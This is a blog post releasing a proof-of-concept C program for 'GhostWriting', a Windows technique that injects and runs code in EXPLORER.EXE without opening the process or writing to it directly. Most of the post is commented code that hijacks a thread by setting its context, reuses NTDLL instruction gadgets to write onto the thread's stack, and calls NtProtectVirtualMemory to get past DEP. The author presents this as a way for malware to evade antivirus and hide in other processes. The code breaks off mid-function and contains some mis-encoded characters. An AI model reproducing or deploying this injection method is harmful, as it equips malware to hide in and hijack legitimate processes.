GhostWriting: Writing to another process without opening it nor actually writing to it

本文介绍了一种名为GhostWriting的新远程代码执行技术,该技术能在不直接打开或写入目标进程的情况下实现代码注入与执行。文章详细阐述了其原理,并提供了一个概念验证的代码示例。
By: c0de90e7

 

This post is written in English because it's the explanation (and release of functional code) of a new technique for win32 based systems called GhostWriting.

The concept

Lots of today's malicious software (virii, trojans, rootkits, etc.) use remote execution techniques in order to avoid AV software, hide themselves, go resident in more suitable processes, and so on.

Remote execution means a process can somehow inject executable code into another process and trigger the execution of said executable code into the context of that process. Injected code can be both, a DLL that gets loaded into the target process or a bunch of code+data bytes directly written into the memory space of the target process.

What we present here is a new way of accomplishing this task of remote code execution or, in more general terms, remote byte injection.

The basic idea of this method is forgetting about this process-centric idea of remote code execution. This is the challenge: writing and running remote code without actually opening the target process. We will not open any process nor will we write to it. Is this a paradox ? No, it is not. It is true that we are not going to use any OpenProcess, DebugActiveProcess, NtOpenProcess or similar functions. We will not even use any WriteProcessMemory, NtWriteVirtualMemory or alike.

The Proof of Concept

This Proof of Concept is self-explanatory, but feel free to discuss it at comments section ;-)


//////
// Proof Of Concept for GhostWriting technique by c0de90e7.    Spring '2007
//
//

#include <windows.h>

HWND STDCALL GetShellWindow(void);

// Machine code bytes that we will inject into EXPLORER.EXE. When this snippet
// gets executed, it will launch a MessageBox and then return to the address
// indicated in ESI register. ESI will point to a EBFE ( JMP $ ) found into
// NTDLL.DLL, so the hijacked thread will enter an autolock state after the
// user clicks OK in this MessageBox.



UCHAR InjectionCode[]=    {    0x6A,0x00,                    // PUSH 0
                            0xE8,0x0D,0x00,0x00,0x00,    // CALL NEXT
                            // Caption text
                            'G','h','o','s','t','W','r','i','t','i','n','g',0x00,
                            0xE8,0x1D,0x00,0x00,0x00,    // CALL NEXT
                            // Message text
                            'R','u','n','n','i','n','g',' ','i','n','t','o',
                            '','E','X','P','L','O','R','E','R','.',
                            'E','X','E','.','.','.',0x00,
                            0x6A,0x00,  // PUSH 0
                            0x56,       // PUSH ESI    
                                        //( return address where MessageBoxA
                                        // should return, we will set ESI
                                        // so that in points
                                        // to a EBFE )
                            0x68,0x00,0x00,0x00,0x00,    // PUSH
                                                        // MessageBoxA    
                                                        // ( we will change
                                                        // those 00s to
                                                        // MessageBoxA
                                                        // address in
                                                        // runtime )
                            0xC3    };                  // RET


// This routine will set thread's context to the values we want and wait till
// thread's EIP reaches a point we indicate. For this proof of concept, we
// will also post some GUI messages to the hijacked thread, so that thread's
// common "wait for messages" nature doesn't slow things down.
//
void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP)
{
    SetThreadContext(Thread,PThreadContext);

    PostMessage(ThreadsWindow,WM_USER,0,0);
    PostMessage(ThreadsWindow,WM_USER,0,0);
    PostMessage(ThreadsWindow,WM_USER,0,0);

    do
    {
        ResumeThread(Thread);
        Sleep(30);  // This could also be Sleep(0) ( Yield, as
                    // NtYieldExecution would do ), but in some cases
                    // ( windows server versions ) this would
                    // lead to slowdowns or even starvation of the hijacked
                    // thread's execution. I have not done further research
                    // into this matter, but
                    // I think this is due to the fact that those server
                    // versions of windows prioritize non-GUI thread's
                    // execution over GUI thread's
                    // execution by default.

        SuspendThread(Thread);
        GetThreadContext(Thread,PThreadContext);
    }
    while(PThreadContext->Eip!=AutoLockTargetEIP);
}

// This routine will disassemble a possible "MOV [REG1],REG2" or
// "MOV [REG1+xx],REG2" instruction and validate its REG1 and REG2 registers so that:
//  a) They are EBX, EBP, ESI or EDI. We need them to be one of those,
//     since they are the only stable ones when it comes to setting thread's
//     context.
//  b) They are not the same ( REG1!=REG2 ). We need them to be different
//     because we will use REG1 to point to memory and REG2 to write a DWORD.
//
int DisassembleAndValidateMOV(
        PUCHAR InstructionMemoryBase,
        ULONG* InstructionMemoryIndex,CONTEXT* PThreadContextBase,
        DWORD** WritePointer,DWORD** WriteItem,
        int* MOVRETOffsetFromMemoryRegister)
{
    UCHAR WritePointerRegIndex,WriteItemRegIndex,ModRM;
    DWORD* ArrayOfValidRegisterAddressesInContext[8];

    // Valid register addresses ( non-volatile ones ). NOTE, ESP is not volatile, but we will not be
    // using it either.
    ArrayOfValidRegisterAddressesInContext[0]=NULL;    // EAX, not valid.
    ArrayOfValidRegisterAddressesInContext[1]=NULL;    // ECX, not valid.
    ArrayOfValidRegisterAddressesInContext[2]=NULL;    // EDX, not valid.
    ArrayOfValidRegisterAddressesInContext[3]=&PThreadContextBase->Ebx;        // EBX, valid, non-volatile,
                                                                            // stable for setting it with
                                                                            // setthreadcontext.
    ArrayOfValidRegisterAddressesInContext[4]=NULL;    // ESP, valid, but we will not use it.
    ArrayOfValidRegisterAddressesInContext[5]=&PThreadContextBase->Ebp;        // EBX, valid, non-volatile,
                                                                            // stable for setting it with
                                                                            // setthreadcontext.
    ArrayOfValidRegisterAddressesInContext[6]=&PThreadContextBase->Esi;        // ESI, valid, non-volatile,
                                                                            // stable for setting it with
                                                                            // setthreadcontext.
    ArrayOfValidRegisterAddressesInContext[7]=&PThreadContextBase->Edi;     // EDI, valid, non-volatile,
                                                                            // stable for setting it with
                                                                            // setthreadcontext.

    if(InstructionMemoryBase[*InstructionMemoryIndex]==0x89)    // Is it a "MOV /r" instruction ?
    {
        ModRM=InstructionMemoryBase[*InstructionMemoryIndex+1];        // if it is, we pick next byte, ModRM.
                                                                    // We will diseminate it into
                                                                    // Mod,dstRM,srcRM.

        if((ModRM&0x80)!=0)    // We need Mod field to be 00 or 01.
            return FALSE;

        WritePointerRegIndex=ModRM&0x07;    // We pick dstRM ( destination register ).
        WriteItemRegIndex=(ModRM>>3)&0x07;    // We pick srcRM ( source register ).

        if(WritePointerRegIndex==WriteItemRegIndex)        // condition "b)", we need source and destination
                                                        // registers to be different REG1!=REG2.
            return FALSE;

        if((ModRM&0x40)==0)        // if Mod field is 00, it is a "MOV [REG1],REG2" instruction. Otherwise,
                                // if it is 01, it is a "MOV [REG1+xx],REG2".
        {                        
            // Mod == 00    =>    "MOV [REG1],REG2"
            if(WritePointerRegIndex==5)    // This is a subcase of "MOV [REG1],REG2" that has to be discarded.
                                        // When Mod is 00 and destination RM is
                   return FALSE;        // 5 ( the value that would indicate EBP ), the instruction is
                                        // not "MOV [EBP],REG2", it turns out to be
                                        // "MOV [immediate32],REG2" instead. That immediate32 is a 32 bit
                                        // address that gets encoded just after
                                        // this ModRM byte
                                        //( 89 RM YY YY YY YY, or 89, ModRM byte, immediate32 dword ).

            *MOVRETOffsetFromMemoryRegister=0;    // See Inject routine. This variable will hold the
                                                // displacement over REG1 register. Since this is
                                                // is the case of a "MOV [REG1],REG2", there is no
                                                // displacement over REG1, so we set it to 0.

            *InstructionMemoryIndex+=2;        // We increment the instruction memory index by 2, because
                                            // that's the size of this instruction ( 89 RM ).
        }
        else
        {    // Mod == 01    =>    "MOV [REG1+xx],REG2"
            *MOVRETOffsetFromMemoryRegister=(signed char)InstructionMemoryBase[*InstructionMemoryIndex+2];    
            // In this case, that "xx" of the
            // instruction is a byte and gets
            // encoded just after the ModRM byte
            // ( 89 RM xx ). So we pick it from
            // instruction memory and set it to
            // this variable as a sign extended
            // byte.
            // NOTE: MOVRETOffsetFromMemoryRegister
            // is a 32 bit integer while this "xx"
            // found in the instruction is a 8 bit
            // integer, thats why we sign extend it
            // by that cast, otherwise, it would not
            // work propperly in negative "xx" cases.

            *InstructionMemoryIndex+=3;     // As we have seen, the encoding of this case takes 3
                                            // bytes ( 89 RM xx ), so we increment instruction memory
                                            // index by 3.
        }

        // If the picked registers are valid ( not NULL ), we set them to WritePointer and WriteItem.
        if ((ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex]!=NULL)
            &&
            (ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex]!=NULL))
        {
            *WritePointer=ArrayOfValidRegisterAddressesInContext[WritePointerRegIndex];
            *WriteItem=ArrayOfValidRegisterAddressesInContext[WriteItemRegIndex];
        }
        else
            return FALSE;

        return TRUE;    // If we reach this point, all the needed requirements have been met.
    }
    else
        return FALSE;
}

// This is the core routine of this PoC. It will hijack a thread, inject code
// to it's stack ( although it could be anywhere... ) and finally run that code
// afterwards.
//
// NOTE: This function gets hijacked thread's handle, a pointer and a size of
// the code we want and what may seem lees obvious, a window handle owned by
// the hijacked thread. We will use that handle to call WaitForThreadAutoLock
// ( see WaitForThreadAutoLock ).
//
int Inject(HANDLE Thread,DWORD* InjectionCode,ULONG NumberOfDWORDsToInject,HWND ThreadsWindow)
{
    CONTEXT SavedThreadContext; // This will hold the initial hijacked thread's register state, so that
                                // we can resume thread's execution in its
                                // original state after we have finished our injection task.

    CONTEXT WorkingThreadContext;    // This one will hold hijacked thread's state while the thread is
                                    // hijacked. We will do Get/SetThreadContexts as
                                    // many times as needed, that's what this technique is all about...

    DWORD* WritePointer;    // This two pointers will point into some fields into WorkingThreadContext
                            // in order to abstract the registers used in the
    DWORD* WriteItem;       // "MOV [REG1],REG2" instruction that the hijacked thread will be executing.
                            // See DisassembleAndValidateMOV routine.

    DWORD JMPTOSELFAddress,MOVRETAddress;    // This two are the addresses of a EBFE ( JMP $ )
                                            // and a "MOV [REG1],REG2"+"RET" respectively. We will find
                                            // them into NTDLL.DLL's code sections ( it could be into
                                            // any module or even other places... ) and we will
                                            // divert hijacked thread's execution to them.

    int MOVRETOffsetFromMemoryRegister;    // See DisassembleAndValidateMOV, this variable holds the
                                        // displacement over REG1 register found in instruction
                                        // "MOV [REG1],REG2" or "MOV [REG1+xx],REG2". If we find a
                                        // "MOV [REG1],REG2", then this variable will be set
                                        // to 0, otherwise, if we find a  "MOV [REG1+xx],REG2", this
                                        // variable will be set to that "xx" value.

    ULONG NumberOfBytesToPopAfterMOVBeforeRET;  // We will look for a pattern like this:
                                                // MOV [REG1],REG2
                                                // RET
                                                // But in order to be more flexible, since this pattern
                                                // is not very common, we will also accept
                                                // patterns like this:
                                                // MOV [REG1],REG2
                                                // POP REGx
                                                // POP REGx
                                                // ...
                                                // RET
                                                // This pattern is far more common, it is indeed very common
                                                // as function's epilogue.
                                                // So, in order to support working with this pattern, we need
                                                // to control the amount of stack balancing
                                                // that will take place after that "MOV [REG1],REG2" and before
                                                // that "RET". We will count the number of
                                                // POP instructions between the MOV and the RET and we will also
                                                // accept "ADD REG,yy" instructions
                                                // ( which are very common instructions also ), and check if that
                                                // REG is ESP, taking that "yy" into
                                                // account if that's the case.


    DWORD BASEOfWrittenBytes,DWORDWritingPointer;

    DWORD InjectedCodeExecutionStart;

    DWORD NtProtectVirtualMemoryAddress;    // This will hold the address of NtProtectVirtualMemory API into
                                            // NTDLL.DLL. We will divert hijacked
                                            // thread's execution flow to that API in the last step of the
                                            // injection, before actually executing the
                                            // injected code. The purpose of this step ( see next array also ) is
                                            // to make our injected code bytes that
                                            // have been stored into hijacked thread's stack be
                                            // PAGE_EXECUTE_READWRITE. By setting thread's EIP to the
                                            // NtProtectVirtualMemory API and setting thread's ESP to a copy
                                            // of NtProtectVirtualMemoryCallFrame ( that
                                            // we will also inject to the hijacked thread's stack ), we will
                                            // simulate a call as if the hijacked thread
                                            // itself did the call. This is based on common anti-DEP techniques
                                            // theory used in some buffer overflow
                                            // exploitation for DEP enabled machines.

    DWORD NtProtectVirtualMemoryCallFrame[1+5+3]=    {    0,    // return address that will point to JMPTOSELF

                                                        0xFFFFFFFF, // (pseudo)handle of current process
                                                        0,          // pointer that will point to base address
                                                                    // of memory region (1)
                                                        0,          // pointer that will point to size of
                                                                    // memory region (2)
                                                        PAGE_EXECUTE_READWRITE, // protection flags
                                                        0,                      // pointer that will point to
                                                                                // a DWORD where original
                                                                                // protection flags
                                                                                // will be stored (3)
                                                        0,                      // [1] base address of the
                                                                                // memory region where the
                                                                                // protection flags are
                                                                                // to be changed
                                                        0,                      // [2] size of the memory
                                                                                // region where the protection
                                                                                // flags are to be
                                                                                // changed
                                                        0    };                 // [3] DWORD to get original
                                                                                // protection flags

    HMODULE NTDLLBase;
    PUCHAR NTDLLCode;
    PIMAGE_NT_HEADERS NTDLLPEHeader;
    ULONG NTDLLCodeSize,i,j,k;

    NTDLLBase=GetModuleHandle("NTDLL.DLL");    // We get NTDLL.DLLs module base.
    
    // We solve NtProtectVirtualMemory API address.
    NtProtectVirtualMemoryAddress=(DWORD)GetProcAddress(NTDLLBase,"NtProtectVirtualMemory");    
    
    // Assume first section starts at Base+1000h, and assume it is a code section...
    NTDLLCode=(PUCHAR)((ULONG)NTDLLBase+0x00001000);    
    
    // We get total code size ( of all the code
    // sections in NTDLL.DLL ). We also assume those
    // code sections are all contiguous...
    NTDLLPEHeader=(PIMAGE_NT_HEADERS)((ULONG)NTDLLBase+((IMAGE_DOS_HEADER*)NTDLLBase)->e_lfanew);      
    NTDLLCodeSize=NTDLLPEHeader->OptionalHeader.SizeOfCode;                                            
                                                                                                       

    JMPTOSELFAddress=MOVRETAddress=(DWORD)NULL;

    i=0;

    // While there is still machine code to look at and we have not found our
    // two needed patterns ( "JMP $" and "MOV [REG1],REG2"+"RET" ), keep searching
    while((i<NTDLLCodeSize)&&((!JMPTOSELFAddress)||(!MOVRETAddress)))    
    {                                                                    
        if(!JMPTOSELFAddress)    // If we still have not found a "JMP $"
        {
            if((NTDLLCode[i]==0xEB)&&(NTDLLCode[i+1]==0xFE))    // check if we have that "JMP $" machine
                                                                // code at this point
            {
                JMPTOSELFAddress=(DWORD)&NTDLLCode[i];    // If we found it, store the address for later usage
                i+=1;    // and increment searching index
            }
        }

        if(!MOVRETAddress)    // If we still have not found a "MOV [REG1],REG2"+"RET"
        {    // check if it is a "MOV [REG1],REG2" or "MOV [REG1+xx],REG2". See DisassembleAndValidateMOV.
            if(DisassembleAndValidateMOV(NTDLLCode,&i,&WorkingThreadContext,&WritePointer,&WriteItem,
                &MOVRETOffsetFromMemoryRegister))
            {    
                // If the instruction was a valid ( see requirements criteria on DisassembleAndValidateMOV
                // comments ) one,
                // we have i pointing to the next opcode bytes after that MOV, WritePointer and WriteItem
                // pointing to the correct register fields into
                // WorkingThreadContext and MOVRETOffsetFromMemoryRegister set to the "xx" value in case the
                // MOV instructions was "MOV [REG1+xx],REG2"

                j=i;
                k=0;

                while(j<i+16)    // in a 16 byte range after that MOV
                {
                    if(((NTDLLCode[j]&0xF8)==0x58)&&(NTDLLCode[j]!=0x5C))    // we look for POP REGx instructions
                    {
                        k+=4;    // if that's the case, we increment ESP balancing counter for later calculations.
                        j+=1;    // We increment this subsearch index
                        continue;    // and we continue with a new instruction byte
                    }

                    if ((NTDLLCode[j]==0x83)&&((NTDLLCode[j+1]&0xF8)==0xC0))    // we look for ADD REGx,yy
                    {
                        if(NTDLLCode[j+1]==0xC4)    // if that REGx is ESP,
                            k+=(signed char)NTDLLCode[j+2];     // we add yy amount of bytes to ESP balancing
                                                                // counter for later use

                        j+=3;    // We increment this subsearch index
                        continue;    // and we continue with a new instruction byte
                    }

                    // we look for a RET or RET n ( with n not above 255 )
                    // if thats the case, we have found the second pattern
                    // ( MOV + RET ).
                    if((NTDLLCode[j]==0xC3)||((NTDLLCode[j]==0xC2)&&(NTDLLCode[j+2]==0x00)))    
                    {                                                                            
                        if(MOVRETOffsetFromMemoryRegister==0)   // if the MOV was a "MOV [REG1],REG2",
                                                                // then i variable was incremented by 2 ( the size
                            MOVRETAddress=(DWORD)&NTDLLCode[i-2];    
                                                                // of its machine code bytes ), so we set
                                                                // MOVRETAddress to NTDLLCode+i-2.
                        else                                    // else, it was a "MOV [REG1+xx],REG2", so i
                                                                // variable was incremented by 3 ( the size
                            MOVRETAddress=(DWORD)&NTDLLCode[i-3];    // of its machine code bytes ), so we set
                                                                    // MOVRETAddress to NTDLLCode+i-3.

                        NumberOfBytesToPopAfterMOVBeforeRET=k;    // we set this variable to the amount
                                                                // accumulated into k ( value that will be
                                                                // added to
                                                                // ESP after the MOV gets executed and
                                                                // just before executing the RET ).

                        i=j+3;    // we increment i so that it points ahead this pattern
                        break;    // and we finish the subsearch
                    }

                    break;        // if we reach a instruction that is not a POP REGx or ADD REGx,yy, we
                                // finish this subsearch
                }
            }
        }

        i++;    // increment i and keep looking for any "JMP $" or "MOV + RET"...
    }

    if((JMPTOSELFAddress)&&(MOVRETAddress))    // If we found those required patterns... fun stuff starts ! ;D
    {
        SuspendThread(Thread);    // we suspend our victim thread, this is where the hijacking starts

        SavedThreadContext.ContextFlags=CONTEXT_FULL;
        WorkingThreadContext.ContextFlags=CONTEXT_FULL;

        GetThreadContext(Thread,&SavedThreadContext);    // we get and save initial thread's state for later
                                                        // restoring it
        GetThreadContext(Thread,&WorkingThreadContext); // we get the same state again, but this time for
                                                        // messing with it

        // here we calculate the amount of thread's stack space we are going to need ( in order to write
        // our injection bytes there )
        // the calculation is as follows:
        //
        //  INITIAL STACK STATUS                           NEW STACK STATUS
        //  ____________________                         ____________________
        // |                    |<--- Stack Bottom      |                    |<--- Stack Bottom
        // |                    |                       |                    |
        // |                    |                       |                    |
        // |                    |                       |                    |
        // |                    |                       |____________________|
        // |                    |                       |                    |<--- ESP ( and also
        //                                                                                BASEOfWrittenBytes )
        // |                    |                       |  RESERVED STACK    | ^
        // |                    |                       |  SPACE FOR OUR     | |
        // |                    |                       |  INJECTION         | |   NumberOfBytesToPopAfter-
        //                                                                            MOVBeforeRET==variable (1)
        // |                    |                       |                    | |                        +
        // |                    |                       |    RESERVED STACK  | |                 sizeof(DWORD)==4                        (2)
        // |                    |                       |     SPACE FOR OUR  | |                        +
        // |                    |                       |         INJECTION  | |  sizeof(NtProtectVirtualMemory-
        //                                                                            CallFrame)==4+20+12    (3)
        // |                    |                       |                    | |                        +
        // |                    |                       |  RESERVED STACK    | |   NumberOfDWORDsToInject*
        //                                                                            sizeof(DWORD)==variable(4)
        // |                    |                       |  SPACE FOR OUR     | |
        // |                    |                       |  INJECTION         | |
        // |____________________|                       |____________________| v
        // |                    |<--- ESP               |                    |<--- Initial ESP
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |  USED STACK SPACE  |                       |  USED STACK SPACE  |
        // |____________________|<--- Stack Top         |____________________|<--- Stack Top
        //
        //
        //
        // [1] 0..N > Number of bytes reserved to hold arbitrary ( we just need the space to be there ) bytes,
        //            so that the "POP REGx" and/or "ADD REGx,yy"
        //          instructions we have found after the "MOV [REG1],REG2", increment ESP to fit into the
        //            next item.
        //
        // [2] 4    > This is the important one. DWORD sized space that will hold a return address. The RET
        //                instruction, which comes after the
        //                "MOV [REG1],REG2" and other possible "POP REGx" and/or "ADD REGx,yy" instructions, will
        //                pop this return address and divert
        //                execution of the thread to that address.
        //
        // [3] 36   > This will hold 9 DWORDs of a simulated stack frame for a call to NtProtectVirtualMemory
        //                API. 1 DWORD for a return address + 5 DWORDs
        //                for the 5 parameters that API function takes + 3 DWORDs for storing 3 local DWORDs
        //                that will be pointed to by 3 out of those 5
        //                parameters. Those 3 pointed parameters are output variables the API needs.
        //
        // [4]      > DWORD boundary aligned size of the machine code we are going to inject and later execute.
        //
        BASEOfWrittenBytes=WorkingThreadContext.Esp-((NumberOfDWORDsToInject*sizeof(DWORD))+((1+5+3)*
            sizeof(DWORD))+sizeof(DWORD)+NumberOfBytesToPopAfterMOVBeforeRET);

        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |<--- ,*WritePointer ( REG1 ) == BASEOfWrittenBytes -
        //                                MOVRETOffsetFromMemoryRegister +
        //                                NumberOfBytesToPopAfterMOVBeforeRET (1)
        // |                    |   ,-| +
        // |                    |   | `MOVRETOffsetFromMemoryRegister ( 0 if using "MOV [REG1],REG2",
        //                                xx if using "MOV [REG1+xx],REG2" )
        // |____________________|    `--------------------------------------.
        // |                    |<--- ,ESP == BASEOfWrittenBytes (2)       |
        // | dummy a            |   ,-| +                                  |
        // | dummy b            |   | `NumberOfBytesToPopAfterMOVBeforeRET |
        // | .                  |   |                                      |
        // | .                  |   |                                      |
        // | dummy z            |   |                                      |
        // |____________________|   |                                      |
        // | return address (3) |/<-Ž                                      |
        // |____________________|/<----------------------------------------Ž
        // |                    |
        // |                    |
        // |                    |                                            SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                                       ________________________________________
        // |                    |         (3) EIP == MOVRETAddress --->|                                        |
        // |                    |                                      |  MOV [REG1],REG2 / MOV [REG1+xx],REG2  |
        // |                    |                                      |  ( POP REGx / ADD REGx,yy )            |
        // |                    |                                      |  .                                     |
        // |                    |                                      |  .                                     |
        // |                    |                                      |  RET / RET n                           |
        // |                    |                                      |________________________________________|
        // |                    |
        // |                    |
        // |                    |                                                SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                                                 _______________________________
        // |                    |(4) *WriteItem ( REG2 ) == JMPTOSELFAddress --->|                               |
        // |                    |                                                |  JMP $                        |
        // |                    |                                                |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //

        // [1] WritePointer points to some register field into WorkingThreadContext ( REG1 in that
        // "MOV [REG1],REG2", see DisassembleAndValidateMOV )
        // and we set that chosen register's  value so that REG1+MOVRETOffsetFromMemoryRegister points to the
        // same place where thread's ESP ( see
        // [2], will have the same value as BASEOfWrittenBytes )+NumberOfBytesToPopAfterMOVBeforeRET points.
        
        *WritePointer=BASEOfWrittenBytes-MOVRETOffsetFromMemoryRegister+NumberOfBytesToPopAfterMOVBeforeRET;

        // [2] we set the new ESP, just the initial ESP minus the number of bytes needed for our injection
        WorkingThreadContext.Esp=BASEOfWrittenBytes;

        // [3] we divert thread's execution to one of the patterns we have found found: "MOV [REG1],
        // REG2"+...+"RET".
        WorkingThreadContext.Eip=MOVRETAddress;

        // [4] WriteItem points to some register field into WorkingThreadContext ( REG2 in that "MOV
        // [REG1],REG2", see DisassembleAndValidateMOV ) and
        // we set its value so that it points to the other pattern we found: "JMP $".
        *WriteItem=JMPTOSELFAddress;

        // Now the trick itself: we let thread's execution continue ( see WaitForThreadAutoLock ) and wait till
        // its EIP register gets a value of
        // JMPTOSELFAddress, this is what happens:
        //
        // a) The thread executes that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2": since REG1 or REG1+xx point
        //    to a DWORD in stack which is going to be
        //    popped out as a return address, after this instruction gets executed, REG2's value will be
        //    stored in stack as a return address.
        // b) After that "MOV [REG1],REG2" or "MOV [REG1+xx],REG2", some "POP REGx" and/or "ADD REGx,yy" may
        //    come. Those are useless for our trick, we
        //    have just taken them into account for stack balancing calculations ( see
        //    NumberOfBytesToPopAfterMOVBeforeRET calculations in that while{}
        //    loop before ). So those "POP REGx" and/or "ADD REGx,yy" could make ESP advancements, but
        //    they are ok since we determined which value ESP
        //    will take before executing the next RET instruction.
        // c) After that set of "POP REGx" and/or "ADD REGx,yy" instructions, we reach a "RET" or "RET n"
        //    instruction, so ESP points to a return address
        //    and ( see "a)" ) that return address has REG2's value, which, if you look at [4] step before,
        //    points to a "JMP $" instruction. So after
        //    this "RET" or "RET n" executes, thread's execution will be diverted to a "JMP $", which, you
        //    can see that, makes the thread enter an
        //    autolock state.
        // d) This WaitForThreadAutoLock routine will eventually see how the hijacked thread's execution
        //    reached that autolock state ( I mean, EIP gets
        //    a value equal to JMPTOSLEFAddress ) and let us continue with our thread manipulation tasks... };>
        WaitForThreadAutoLock(Thread,&WorkingThreadContext,ThreadsWindow,JMPTOSELFAddress);

        // Ooookkeeyyy, pretty complex thread manipulation but... what have we achieved so far ? Nothing...
        // nothing ? Not yet, but keep going. This is
        // what we have achieved:
        //
        //
        //  STACK STATUS
        //  ____________________
        // |                    |<--- Stack Bottom
        // |                    |
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- BASEOfWrittenBytes
        // | dummy a            |
        // | dummy b            |
        // | .                  |
        // | .                  |
        // | dummy z            |
        // |____________________|
        // | JMPTOSELFAddress -------------------.
        // |____________________|                |
        // |                    |<--- ESP        |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |
        // |                    |                |                               SOMEWHERE INTO NTDLL.DLL's CODE
        // |                    |                |                               _______________________________
        // |                    |                | EIP == JMPTOSELFAddress --->/|                               |
        // |                    |                `---------------------------->/|  JMP $                        |
        // |                    |                                               |_______________________________|
        // |                    |
        // |                    |
        // |                    |
        // |____________________|
        // |                    |<--- Initial ESP
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |  USED STACK SPACE  |
        // |____________________|<--- Stack Top
        //
        //
        // So... it may seem we have nothing here, but we do have something. That return address is
        // now an address that points to "JMP $", this means
        // that, from now on, we can repeat the process as many times as we need/want and we no longer
        // need REG1 to point to that return address and
        // we no longer need that REG2 to point to "JMP $" intruction. We must simply readjust thread's
        // ESP to point to the same initial point we gave
        // it the previous time ( BASEOfWrittenBytes ) and readjust EIP so that it points to the same
        // initial address of the previous time ( that is,
        // MOVRETAddress ). We can set REG1 to be "anywhere" and set REG2 to be "anything", so, from now on,
        // we can write any DWORD to any place. Get
        // the idea ?

        // What comes next is a loop for writing 9 DWORDs that represent a simulated call frame to
        // NtProtectVirtualMemory API. We will simulate a call
        // to this API in order to mark our injection memory ( a range of bytes into the region we
        // reserved for the injection in the stack ) as
        // PAGE_EXECUTE_READWRITE, so that DEP ( Data Execution Prevention ) does not stop us from
        // executing the injected code later on. Let's see
        // NtProtectVirtualMemory's C language prototype:
        //
        // NtProtectVirtualMemory(    IN HANDLE ProcessHandle,
        //                            IN OUT PVOID *BaseAddress,
        //                            IN OUT PULONG NumberOfBytesToProtect,
        //                            IN ULONG NewAccessProtection,
        //                            OUT PULONG OldAccessProtection );
        //
        // Okey, so, it takes 5 parameters, why 9 DWORDs then ?
        //
        // | SIMULATED RETADDR  |                (1)1st DWORD: This will hold the address to where the API
        //                                            would return after doing its job,
        // | p.1: ProcessHandle |                2nd DWORD: This will hold 0xFFFFFFFF ( -1, current process,
        //                                            see NtProtectVirtualMemoryCallFrame ),
        // | p.2: &BaseAddress -----------.        (2) 3rd DWORD: We will make this have a pointer to the 7th DWORD,
        // | p.3: &NumBytesProt --------. |        (3) 4th DWORD: We will make this have a pointer to the 8th DWORD,
        // | p.4: NewAccessProt |       | |        5th DWORD: This will hold PAGE_EXECUTE_READWRITE (
        //                                            see NtProtectVirtualMemoryCallFrame ),
        // | p.5: &OldAccessPrt ----.   | |        (4) 6th DWORD: We will make this have a pointer to
        //                                            the 9th DWORD,
        // | BaseAddress        |<--+---+-Ž        (5) 7th DWORD: We will make this to be a pointer to our
        //                                            injection's executable code ( put in the stack )
        // | NumBytesProt       |<--+---Ž        (6) 8th DWORD: We will make this to be the size of our
        //                                            injection's executable code.
        // | OldAccessPrt       |<--Ž            9th DWORD: We do not care about this, we just need to
        //                                            reserve the space...
        //

        // [1] We need to be able to synchronize the moment when NtProtectVirtualMemory finishes and
        //        make the thread stop there, so we set this DWORD to
        //     JMPTOSELFAddress ( address of "JMP $" instruction ).
        NtProtectVirtualMemoryCallFrame[0]=JMPTOSELFAddress;

        // [2] We make the 3rd DWORD point to the 7th DWORD, as we are going to write this 9 DWORD array to
        //        the stack, just after the return address
        //     we have been using in the previous step, we make the pointer calculations like this:
        //
        //     BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+sizeof(DWORD)+...
        //     BASE + skip dummy DWORDs that will be popped + skip return address+... ( those "..." are
        //        the BASE for this 9 DWORD array ).
           //
        // So in this case, to point to 7th DWORD, we need to skip those and then skip 1 more DWORD for
        //    the return address of this call frame plus 5
        // DWORDs for the 5 parameters.
        NtProtectVirtualMemoryCallFrame[2]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+
            sizeof(DWORD)+((1+5+0)*sizeof(DWORD));

        // [3] We make the 4th DWORD point to the 8th DWORD, we do it as we did it for [2], but we skip a
        //    DWORD more
        NtProtectVirtualMemoryCallFrame[3]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+
            sizeof(DWORD)+((1+5+1)*sizeof(DWORD));

        // [4] We make the 6th DWORD point to the 9th DWORD, we do it as we did it for [2], but we skip two
        //    more DWORDs
        NtProtectVirtualMemoryCallFrame[5]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+
            sizeof(DWORD)+((1+5+2)*sizeof(DWORD));

        // [5] This is not as the previous 3, this is not a parameter, it is a local variable, pointed by
        //    parameter 2 ( 3rd DWORD ). We make it point
        //  to a point in the stack where we will be injecting executable code. That point will be just
        //    after this 9 DWORD call frame, thats why
        //  we skip one more DWORD.
        NtProtectVirtualMemoryCallFrame[6]=BASEOfWrittenBytes+NumberOfBytesToPopAfterMOVBeforeRET+
            sizeof(DWORD)+((1+5+3)*sizeof(DWORD));

